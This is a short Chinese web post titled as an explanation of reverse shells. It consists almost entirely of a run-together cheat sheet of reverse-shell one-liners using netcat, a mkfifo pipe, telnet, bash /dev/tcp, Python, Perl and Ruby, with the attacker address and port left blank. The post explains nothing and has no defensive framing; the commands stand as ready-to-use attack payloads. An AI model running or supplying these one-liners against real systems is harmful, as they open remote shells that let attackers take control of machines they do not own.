反弹Shell(反弹shell原理)

网友投稿 277 2022-10-13


反弹Shell(反弹shell原理)

#clientnc -vlp #server#ncnc -e /bin/sh nc.exe -e C:\WINDOWS\system32\cmd.exe mkfifo bd;cat bd | /bin/sh -i 2>&1 | nc >bdmknod bd p;cat bd|/bin/sh -i 2>&1|nc >bd#telnetmkfifo bd;cat bd|/bin/sh -i 2>&1|telnet >bdtelnet | /bin/sh |telnt #bashbash -c "bash -i &>/dev/tcp// 0>&1"bash -c "exec 9<> /dev/tcp/localhost/8080&&exec 0<&9&&exec 1>&9 2>&1&&/bin/bash --noprofile"#pythonpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'#perlperl -e 'use Socket;$i="";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'#rubyruby -rsocket -e'f=TCPSocket.open("",).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:PCM复用设备与电话光端机的区别
下一篇:Java实现图片上传至FastDFS入门教程
相关文章

 发表评论

暂时没有评论,来抢沙发吧~